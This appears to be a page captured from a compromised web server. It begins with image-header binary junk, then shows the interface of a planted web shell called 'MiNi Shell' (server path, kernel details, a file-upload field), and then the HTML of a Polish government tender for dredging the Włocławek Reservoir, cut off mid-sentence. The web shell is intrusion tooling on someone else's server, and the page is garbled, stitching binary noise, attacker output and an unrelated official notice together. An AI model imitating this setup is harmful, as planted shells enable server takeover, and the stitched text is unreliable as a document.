JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211105/0025974901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przeprowadzenie prac bagrowniczych w obrębie Zbiornika Włocławskiego w celu poprawy bezpieczeństwa przeciwpowodziowego na obszarach przyległych”- bis </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Wodne Wody Polskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 368302575</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żelazna 59a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-848</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kzgw@wody.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.wody.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Regionalny Zarząd Gospodarki Wodnej w Warszawie</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">REGON: 368302575</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Zarzecze 13B</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">03-194</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">anna.muszalska@wody.gov.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.przetargi.wody.gov.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przeprowadzenie prac bagrowniczych w obrębie Zbiornika Włocławskiego w celu poprawy bezpieczeństwa przeciwpowodziowego na obszarach przyległych”- bis </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c50e0f3d-3e3e-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00259749</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00010273/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.124 Udrożnienie rzeki Wisły na terenie działania Zarządu Zlewni we Włocławku - RZGW Warszawa</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.przetargi.wody.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.przetargi.wody.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z z art. 61 ust. 1 ustawy Pzp, komunikacja między Zamawiającym a Wykonawcami odbywa się w formie elektronicznej, za pośrednictwem Platformy Zakupowej – zwanej dalej „Platformą” – pod adresem:<br/>https://przetargi.wody.gov.pl/.<br/>2 Korzystanie z Platformy jest nieodpłatne. Instrukcja korzystania z Platformy znajduje się pod adresem<br/>przetargi.wody.gov.pl w zakładce: Instrukcja dla Wykonawców.<br/>3 Korzystanie z Platformy nie wymaga zarejestrowania konta na Platformie.<br/>4 Dokumenty związane z postępowaniem Zamawiający zamieszcza na Platformie w zakładce z przedmiotowym postępowaniem.<br/>5 Celem skomunikowania się z Zamawiającym (z wyłączeniem złożenia oferty oraz dokumentów lub<br/>oświadczeń składanych razem z ofertą, których sposób złożenia został opisany w pkt 14.1 – 14.6<br/>specyfikacji warunków zamówienia, zwanej dalej „SWZ”), Wykonawca korzysta z zakładki „Zapytaj”.<br/>Zakładka ta służy również Zamawiającemu do komunikacji z Wykonawcami.<br/>6 Za datę wpływu wszelkiej korespondencji do Zamawiającego, w tym złożenia oferty oraz dokumentów lub oświadczeń składanych razem z ofertą, uważa się datę wczytania korespondencji na Platformie.<br/>7 Zamawiający zaleca sporządzenie korespondencji w następujących formatach: .doc., .docx, .rtf, .pdf, .xls.<br/>8 Zamawiający informuje, że adres e-mail: przetargi_warszawa@wody.gov.pl,<br/>anna.muszalska@wody.gov.pl oraz zp.wloclawek@wody.gov.pl wskazane w ogłoszeniu o zamówieniu,<br/>służy jedynie do przesyłania ogłoszeń i otrzymywania informacji zwrotnej z Biuletynu Zamówień<br/>Publicznych. Nie są to adresy do komunikacji z Wykonawcami.<br/>9 Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy wynosi 150 MB.<br/>10 Dokumenty elektroniczne, oświadczenia lub cyfrowe odwzorowania dokumentów lub oświadczeń<br/>składane są przez Wykonawcę za pośrednictwem Platformy jako załączniki. Sposób sporządzenia<br/>dokumentów elektronicznych, oświadczeń lub cyfrowych odwzorowań dokumentów lub oświadczeń<br/>musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów dnia 30<br/>grudnia 2020 r. sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych<br/>dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z<br/>dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja dotycząca przetwarzania danych osobowych.<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i<br/>w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119<br/>z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>a) administratorem Pani/Pana danych osobowych jest Państwowe Gospodarstwo Wodne Wody Polskie<br/>z siedzibą w Warszawie przy ul. Żelaznej 59A,<br/>00-848 Warszawa, REGON: 368302575, NIP: 527-282-56-16;<br/>b) kontakt z Inspektorem ochrony danych w PGW WP możliwy jest pod adresem<br/>e-mail: iod@wody.gov.pl;<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO<br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego oznaczonego numerem postępowania WA.ROZ.2810.93.2021/ZZWŁ prowadzonym na podstawie przepisów ustawy z dnia 11<br/>września 2019 r. Prawo zamówień publicznych;<br/>d) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz<br/>art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>e) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy<br/>z dnia 11 września 2019 r. Prawo zamówień publicznych, przez okres 4 lat licząc od końca roku<br/>kalendarzowego, w którym zakończono postępowanie o udzielenie zamówienia, a jeżeli czas trwania<br/>umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy z dnia<br/>11 września 2019 r. Prawo zamówień publicznych, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane<br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO<br/>h) posiada Pani/Pan:<br/>􀀀 na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>􀀀 na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych<br/>(skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym<br/>z przepisami ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych oraz nie może naruszać<br/>integralności protokołu oraz jego załączników);<br/>􀀀 na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu ochrony<br/>praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego);<br/>􀀀 prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo,<br/>że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO<br/>i) nie przysługuje Państwu:<br/>􀀀 w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>􀀀 prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>􀀀 na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WA.ROZ.2810.93.2021/ZZWŁ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia pn. „Przeprowadzenie prac bagrowniczych w obrębie Zbiornika<br/>Włocławskiego w celu poprawy bezpieczeństwa przeciwpowodziowego na obszarach<br/>przyległych”, są prace utrzymaniowe - udrożnieniowe na obszarze rz. Wisły, polegające na<br/>usunięciu materiału dennego i odłożeniu go zgodnie ze współrzędnymi miejsca odkładu. Miejsca<br/>poboru :<br/>Lokalizacja nr 1 – Dobrzyków -o szerokości ok. 55 m i długości ok. 195 m (pow.9888,9 m2).<br/>Głębokość udrożnienia do 0,5 m (maksymalna rzędna dna do 54.50 m n.p.m.),<br/>Lokalizacja nr 2 –Dobrzyków - o szerokości ok. 55 m i długości ok. 185 m (pow.9825,0 m2).<br/>Głębokość udrożnienia do 0,5 m (maksymalna rzędna dna do 54.50 m n.p.m.),<br/>Lokalizacja nr 3 – Gmury - o szerokości ok. 57 m i długości ok. 180 m (pow.9845,0 m2).<br/>Głębokość udrożnienia do 0,5 m (maksymalna rzędna dna do 54.50 m n.p.m.),<br/>Lokalizacja nr 4 – Rokicie -o szerokości ok. 67 m i długości ok. 165 m (pow.9909,1 m2).<br/>Głębokość udrożnienia do 0,5 m (maksymalna rzędna dna do 54.50 m n.p.m.).<br/>Do prac użyte zostanie urządzenie ssąco – refulujące. Zassana przez rurę ssawną urządzenia<br/>mieszanina piaskowo-wodna zostanie przetransportowana z obszarów udrażnianych w rejon<br/>odkładu metodą hydrauliczną za pośrednictwem rurociągu tłocznego.<br/>Szczegółowy opis przedmiotu zamówienia zawiera Opis przedmiotu zamówienia stanowiący Załącznik Nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">25 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocenie będą podlegały oferty ważne tj. oferty niepodlegające<br/>odrzuceniu.<br/>2. Oferty oceniane będą na podstawie następujących kryteriów:<br/>2.1 cena brutto – waga 60 %<br/>2.2 termin realizacji – waga 40 %.<br/>3. Ocena ofert zostanie dokonana wg poniższego wzoru:<br/>P = Pc + Pt<br/>gdzie:<br/>P – łączna liczba punktów przyznanych badanej ofercie,<br/>Pc – liczba punktów w kryterium „cena brutto”,<br/>Pt – liczba punktów w kryterium „termin realizacji”.<br/>4. Ocena w poszczególnych kryteriach dokonywana będzie na poniższych zasadach:<br/>4.1 Każda z ważnych ofert będzie punktowana w kryterium określonym<br/>w pkt 2.1. powyżej (15.2.1 SWZ) poprzez porównanie ceny brutto oferty badanej do ceny brutto<br/>najniższej ze wszystkich ważnych ofert, wg poniższego wzoru:<br/>Pc = (Cn : Cb) x 60<br/>gdzie:<br/>Cn – cena brutto najniższa spośród wszystkich ofert podlegających ocenie,<br/>Cb – cena brutto oferty badanej.<br/>4.2 Każda z ważnych ofert będzie punktowana w kryterium określonym w pkt 2.2 powyżej (15.2.2<br/>SWZ) poprzez porównanie terminu realizacji robót oferty badanej do terminu realizacji robót<br/>najkrótszego ze wszystkich ważnych ofert, wg poniższego wzoru<br/>Pt = (Tn : Tb) x 40<br/>gdzie:<br/>Tn – termin realizacji robót najkrótszy spośród wszystkich ofert podlegających ocenie, <br/>Tb – termin realizacji robót oferty badanej<br/>UWAGA !<br/>Termin wykonania robót, liczony w dniach kalendarzowych od dnia podpisania umowy, można<br/>maksymalnie skrócić o 5 dni kalendarzowych. Zaoferowany przez wykonawcę termin wykonania robót<br/>musi zmieścić się w następującym zakresie liczby dni kalendarzowych: od minimum 20 do maksimum<br/>25 dni kalendarzowych od daty zawarcia umowy.<br/>4.3 Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w<br/>SWZ. Za najkorzystniejszą zostanie uznana oferta, która łącznie (suma punktów przyznanych we<br/>wszystkich kryteriach oceny ofert) uzyska największą liczbę punktów obliczonych zgodnie z wzorem<br/>określonym w pkt 3 powyżej (15.3 SWZ).<br/>5. Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki udziału w<br/>postępowaniu:<br/>1/ Wykonawca musi wykazać się wykonaniem w terminie nie wcześniejszym niż w okresie<br/>ostatnich 5 lat, liczonym wstecz od dnia w którym upływa termin składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy, w tym okresie - co najmniej 1 zamówienie:<br/>obejmujące swym zakresem, w ramach jednego kontraktu, udrożnienie rzeki poprzez wydobycie<br/>urobku pogłębiarką/pogłębiarkami ssąco – refulującymi w ilości co najmniej 10.000,00 m3,<br/>2/ Wykonawca musi wykazać iż dysponuje odpowiednim potencjałem technicznym:<br/>- posiada dostęp do niezbędnych narzędzi, wyposażenia zakładu i urządzeń technicznych w celu<br/>wykonania zamówienia, tj.:<br/>- min 1 urządzenie ssąco – refulujące o wydajności min. 500 m3/ h<br/>Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w<br/>stosownych sytuacjach, polegać na zdolnościach technicznych lub zawodowych lub sytuacji<br/>finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>W przypadku, gdy Wykonawca powołuje się na doświadczenie nabyte w ramach zamówienia<br/>zrealizowanego przez wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia (konsorcjum), Zamawiający nie dopuszcza by Wykonawca wykazywał<br/>doświadczenie grupy wykonawców, której był członkiem, jeżeli faktycznie i konkretnie nie<br/>wykonywał danego zakresu czynności. Zamawiający zastrzega sobie możliwość zwrócenia się<br/>do Wykonawcy o udzielenie wyjaśnień w zakresie faktycznie i konkretnie zrealizowanego<br/>zakresu czynności oraz przedstawienia stosownych dowodów np. umowy konsorcjum, z której wynika zakres obowiązków, czy wystawionych przez wykonawcę faktur. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, w zakresie podstaw<br/>wykluczenia z postępowania wskazanych przez zamawiającego, zgodnego z wzorem stanowiącym<br/>Załącznik nr 4 do SWZ.<br/>2. informacja z Krajowego Rejestru Karnego w zakresie określonym<br/>w art. 108 ust. 1 pkt 1, 2 i 4 ustawy Pzp, sporządzone nie wcześniej niż 6 miesięcy przed jej złożeniem.<br/>3. odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, sporządzone nie wcześniej niż 3 miesiące przed ich złożeniem, jeżeli<br/>odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw<br/>wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp.<br/>4. oświadczenie wykonawcy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu<br/>ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który<br/>złożył odrębną ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie<br/>od innego wykonawcy należącego do tej samej grupy kapitałowej, zgodnego z wzorem stanowiącym Załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. wykazu robót budowlanych wykonanych nie 